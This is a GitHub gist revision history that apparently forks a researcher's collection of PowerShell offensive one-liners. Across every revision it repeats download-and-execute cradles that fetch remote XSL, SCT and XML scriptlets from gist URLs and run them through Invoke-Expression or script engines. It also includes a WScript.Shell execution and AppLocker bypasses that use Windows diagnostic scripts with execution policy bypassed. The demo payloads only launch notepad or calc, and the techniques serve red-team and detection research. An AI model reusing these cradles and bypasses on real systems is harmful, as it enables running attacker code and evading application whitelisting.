-
-
Save wilsonfisk77/3c189ef8e8562bcfdba75c2503c7d016 to your computer and use it in GitHub Desktop.
Revisions
-
bohops revised this gist
Apr 16, 2018 . No changes.There are no files selected for viewing
-
Feb 21, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +1,6 @@ ############################################################################## ### Powershell Xml/Xsl Assembly "Fetch & Execute" ### [https://twitter.com/bohops/status/966172175555284992] $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z; -
Feb 21, 2018 . 1 changed file with 8 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,11 +1,17 @@ ############################################################################## ### Powershell Xml/Xsl Assembly "Fetch & Execute" ### [https://twitter.com/bohops/status/965670898379476993] $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z; ############################################################################## ### Powershell VBScript Assembly SCT "Fetch & Execute" ### [https://twitter.com/bohops/status/965670898379476993] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://gist.github.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct').Exec(0) ############################################################################## ### Powershell JScript Assembly SCT "Fetch & Execute" ### [https://twitter.com/bohops/status/965085651199840258] [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://gist.github.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) -
Feb 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -41,5 +41,5 @@ SyncInvoke notepad.exe ### [@HarmJ0y - https://gist.github.com/HarmJ0y/bb48307ffa663256e239] $a = New-Object System.Xml.XmlDocument $a.Load("https://gist.github.com/bohops/0e7f900bba16181f01575bdd43b383e9/raw/1d4913d032903f0aa9d8e9ab62891745ee814043/notepad.xml") $a.command.a.execute | iex -
Feb 20, 2018 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -2,13 +2,13 @@ ### Powershell VBScript Assembly SCT Execution ### [https://twitter.com/bohops/status/965670898379476993] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://gist.github.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct').Exec(0) ############################################################################## ### Powershell JScript Assembly SCT Execution ### [https://twitter.com/bohops/status/965085651199840258] [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://gist.github.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) ############################################################################## ### Powershell JScript Assembly ActiveXObject Script Execution -
Feb 20, 2018 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -2,13 +2,13 @@ ### Powershell VBScript Assembly SCT Execution ### [https://twitter.com/bohops/status/965670898379476993] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://gist.github.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/12ddbfab98781eaf23e1bd2898dd24fe75fb251a/notepad.sct').Exec(0) ############################################################################## ### Powershell JScript Assembly SCT Execution ### [https://twitter.com/bohops/status/965085651199840258] [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://gist.github.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/12ddbfab98781eaf23e1bd2898dd24fe75fb251a/notepad.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) ############################################################################## ### Powershell JScript Assembly ActiveXObject Script Execution -
Feb 20, 2018 . 1 changed file with 18 additions and 3 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,30 +1,45 @@ ############################################################################## ### Powershell VBScript Assembly SCT Execution ### [https://twitter.com/bohops/status/965670898379476993] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://path/to/some.sct').Exec(0) ############################################################################## ### Powershell JScript Assembly SCT Execution ### [https://twitter.com/bohops/status/965085651199840258] [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://path/to/some.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) ############################################################################## ### Powershell JScript Assembly ActiveXObject Script Execution ### [@gabemarshall - https://gist.github.com/gabemarshall/a708aad5b70a31d0bec19b86a1b73c28/raw/44e74c465b5585dc7a941103aa8742b928933ccf/jscript.ps1] [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");'[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()); ############################################################################## ### Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts ### [https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/] powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module .\CL_LoadAssembly.ps1 LoadAssemblyFromPath ..\..\..\..\path\assembly.exe [name.space]::executesomething() ############################################################################## ### Command Invocation w/ PowerShell Diagnostic Scripts ### [https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/] powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module CL_Invocation.ps1 SyncInvoke notepad.exe ############################################################################## ### PowerShell CL Download Cradle ### [@subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d] ### [@HarmJ0y - https://gist.github.com/HarmJ0y/bb48307ffa663256e239] $a = New-Object System.Xml.XmlDocument $a.Load("https://gist.github.com/bohops/0e7f900bba16181f01575bdd43b383e9/raw/aefe626d2571e5c22e30e77bf36b29a4f36af49e/notepad.txt") $a.command.a.execute | iex -
Feb 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -21,7 +21,7 @@ cd C:\windows\diagnostics\system\AERO import-module CL_Invocation.ps1 SyncInvoke notepad.exe ### PowerShell CL Download Cradle ### [@subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d] ### [@HarmJ0y - https://gist.github.com/HarmJ0y/bb48307ffa663256e239] -
Feb 20, 2018 . 1 changed file with 13 additions and 5 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,22 +1,30 @@ ### SCT VBScript/JScript Execution ### [ [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://path/to/some.sct').Exec(0) [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://path/to/some.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) ### Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module .\CL_LoadAssembly.ps1 LoadAssemblyFromPath ..\..\..\..\path\assembly.exe [name.space]::executesomething() ### Command Invocation w/ PowerShell Diagnostic Scripts powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module CL_Invocation.ps1 SyncInvoke notepad.exe ### PowerShell v5+ Download Cradle ### [@subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d] ### [@HarmJ0y - https://gist.github.com/HarmJ0y/bb48307ffa663256e239] $a = New-Object System.Xml.XmlDocument $a.Load("https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt") $a.command.a.execute | iex -
Feb 20, 2018 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +1,7 @@ ###SCT VBScript/JScript Execution [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://path/to/some.sct').Exec(0) [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://path/to/some.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) -
Feb 20, 2018 . 1 changed file with 11 additions and 3 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,13 +1,21 @@ ###SCT VBScript/JScript Execution [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://path/to/some.sct').Exec(0) [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://path/to/some.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) ###Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module .\CL_LoadAssembly.ps1 LoadAssemblyFromPath ..\..\..\..\path\assembly.exe [name.space]::executesomething() ###Command Invocation w/ PowerShell Diagnostic Scripts powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module CL_Invocation.ps1 SyncInvoke notepad.exe -
Feb 20, 2018 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,13 @@ #SCT VBScript/JScript Execution [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://path/to/some.sct').Exec(0) [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://path/to/some.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) #Loading .Net/C# Assemblies to Bypass AppLocker Default Rules powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module .\CL_LoadAssembly.ps1 LoadAssemblyFromPath ..\..\..\..\path\assembly.exe [name.space]::executesomething()